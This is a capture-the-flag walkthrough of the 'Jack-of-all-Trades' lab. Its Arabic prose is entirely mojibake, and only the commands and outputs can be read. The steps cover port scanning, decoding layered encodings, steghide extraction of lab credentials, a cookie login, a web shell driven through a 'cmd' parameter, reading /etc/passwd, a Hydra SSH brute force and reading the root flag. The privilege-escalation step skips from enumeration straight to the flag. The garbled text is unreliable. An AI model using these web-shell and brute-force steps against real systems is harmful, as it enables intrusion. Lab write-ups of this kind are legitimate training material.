# ุญู ูุงุจ Jack-of-all-Trades

---

## ๐ฏ ุงููุฏู

ูุฌูุจ **ุนูู ุงููุณุชุฎุฏู** ู **ุนูู ุงูุฑูุช** ุนู ุทุฑูู ุชุญููู ุงูุฎุฏูุงุช ูุงูุชุดุงู ุงูุซุบุฑุงุช ุงููุฎููุฉ ุฎุทูุฉ ุฎุทูุฉ.

---

## ๐ ุงูููุฑุณ

* ุงูุงุณุชูุดุงู
* ุชุญููู ุงูุณูุฑุณ
* ูู ุงูุชุฑููุฒุงุช
* ุงุณุชุฎุฑุงุฌ ุงูุณุชูุฌู
* ุชุณุฌูู ุงูุฏุฎูู
* ุชูููุฐ ุงูุฃูุงูุฑ
* ูุณุฑ ูููุฉ ุงููุฑูุฑ
* ุนูู ุงููุณุชุฎุฏู
* ุชุตุนูุฏ ุงูุตูุงุญูุงุช
* ุนูู ุงูุฑูุช
* ููุฎุต ูุณุงุฑ ุงูุงุฎุชุฑุงู
* ุงูุฏุฑูุณ ุงููุณุชูุงุฏุฉ

---

## ๐งญ ุงูุงุณุชูุดุงู

ุฃูู ุฎุทูุฉ ุฏุงูููุง:

```bash
nmap -Pn -sV $TARGET
```

ุงููุชูุฌุฉ:

```
22 โ HTTP
80 โ SSH
```

๐ ุงูููุงุญุธุฉ
ุงูููุงูุฐ ูุนููุณุฉ โ ุญุฑูุฉ ุชุถููู ููุงุณูููุฉ.

---

## ๐ ุชุญููู ุงูุณูุฑุณ

ุงูุฏุฎูู:

```
http://$TARGET:22
```

ุชูุญุต ุงูููุฏ ุงููุตุฏุฑู โ ููุงูู:

* ูุณุงุฑ ูุฎูู

```
/recovery.php
```

* ูุต ูุดูุฑ Base64

---

## ๐ ูู ุงูุชุฑููุฒุงุช

ููู Base64:

```bash
echo "ุงููุต" | base64 -d
```

ุงููุงุชุฌ:

```
password=u?WtKSraq
```

---

### ุตูุญุฉ ุงูุงุณุชุฑุฌุงุน

```
curl http://$TARGET:22/recovery.php
```

ููุงูู ุชุนููู Base32

ูููู:

```bash
echo "ุงููุต" | base32 -d | xxd -r -p
```

ุงููุงุชุฌ โ ROT13
ูููู โ ูุทูุน ุฑุงุจุท ุชูููุญ

๐ก ุชูููุญ ุงููุงุจ: ุฌุงู ูุญุจ ุงูุฏููุงุตูุฑุงุช

---

## ๐ผ ุงุณุชุฎุฑุงุฌ ุงูุณุชูุฌู

ุชุญููู ุงูุตูุฑ:

```bash
wget http://$TARGET:22/assets/stego.jpg
wget http://$TARGET:22/assets/header.jpg
```

ูุญุต ุงูุฃููู:

```bash
steghide info stego.jpg
```

ูุฌุฑุจ ุงูุจุงุณ:

```
u?WtKSraq
```

ูุนุทููุง:

```
creds.txt
```

ุงูุตูุฑุฉ ุงูุซุงููุฉ:

```bash
steghide extract -sf header.jpg
```

ูุนุทููุง:

```
cms.creds
```

ุงููุญุชูู:

```
jackinthebox : TplFxiSHjY
```

---

## ๐ ุชุณุฌูู ุงูุฏุฎูู

```bash
curl -i -X POST http://$TARGET:22/recovery.php \
-d "user=jackinthebox&pass=TplFxiSHjY"
```

ูุญุตู Cookies + Redirect

ูุญูุธูุง ุจููู:

```
cookies.txt
```

ุงูุฏุฎูู:

```bash
curl -b cookies.txt http://$TARGET:22/nnxhweOV/index.php
```

ูุธูุฑ:

```
GET me a 'cmd' and I'll run it for you Future-Jack.
```

๐ฅ ูุนูู ุนูุฏูุง ุชูููุฐ ุฃูุงูุฑ ูุจุงุดุฑ

---

## ๐ป ุชูููุฐ ุงูุฃูุงูุฑ

```bash
curl -b cookies.txt \
"http://$TARGET:22/nnxhweOV/index.php?cmd=pwd"
```

ูุฌุฑุจ:

```bash
cat /etc/passwd
```

ููุงูู ูุณุชุฎุฏู ููู:

```
jack
```

---

## ๐ ูุณุฑ ูููุฉ ุงููุฑูุฑ

ุนุฑุถ ูููุงุช ุงูููู:

```bash
ls /home
cat /home/jacks_password_list
```

ุชุดุบูู Hydra:

```bash
hydra -l jack -P pass.txt -s 80 ssh://$TARGET -t 4 -V
```

ุชุณุฌูู ุงูุฏุฎูู:

```bash
ssh -p 80 jack@$TARGET
```

---

## ๐ ุนูู ุงููุณุชุฎุฏู

```bash
ls -lah
scp -P 80 jack@$TARGET:/home/jack/user.jpg .
```

ููุชุญ ุงูุตูุฑุฉ โ ูุธูุฑ ุงูุนูู

---

## โฌ๏ธ ุชุตุนูุฏ ุงูุตูุงุญูุงุช

ูุฌุฑุจ sudo:

```
sudo -l
```

ูุงูู

ูุจุญุซ SUID:

```bash
find / -perm -4000 -type f 2>/dev/null
```

ูุจุญุซ ูููุงุช root ูุงุจูุฉ ูุฑุงุกุฉ:

```bash
find / -user root -readable -type f 2>/dev/null
```

ููุงูู:

```
/root/root.txt
```

---

## ๐ ุนูู ุงูุฑูุช

```bash
strings /root/root.txt
```

ูุธูุฑ ุงูุนูู ๐ฏ

---

## ๐ง ููุฎุต ูุณุงุฑ ุงูุงุฎุชุฑุงู

```
ุงุณุชูุดุงู
 โ
ุชุนููู ูุฎูู
 โ
ุชุฑููุฒ
 โ
Stego
 โ
ุจูุงูุงุช ุฏุฎูู
 โ
ุชุฌุงูุฒ ุชุณุฌูู ุงูุฏุฎูู
 โ
ุชูููุฐ ุฃูุงูุฑ
 โ
ูุงุฆูุฉ ูููุงุช ูุฑูุฑ
 โ
SSH
 โ
ุชุตุนูุฏ ุตูุงุญูุงุช
 โ
Root
```

---

## ๐ ุงูุฏุฑูุณ ุงููุณุชูุงุฏุฉ

* ูุง ุชุซู ุจุงูููุงูุฐ ุงูุธุงูุฑุฉ
* ุงูุชุนูููุงุช ููุฒ ูุนูููุงุช
* ุงูุชุฑููุฒุงุช ุงููุชุณูุณูุฉ ุนูุงูุฉ ุชุญุฏู
* ุงูุตูุฑ ูููู ุชุฎุจูู ุจูุงูุงุช
* ุฃุญูุงููุง ุฃุจุณุท ุซุบุฑุฉ = ูุฏุฎู ูุงูู

---

โ ุฎูุต ุงููุงุจ
ูู ูุตูุช ูููู ูุงูุช ูุงุดู ุตุญ ๐ฅ
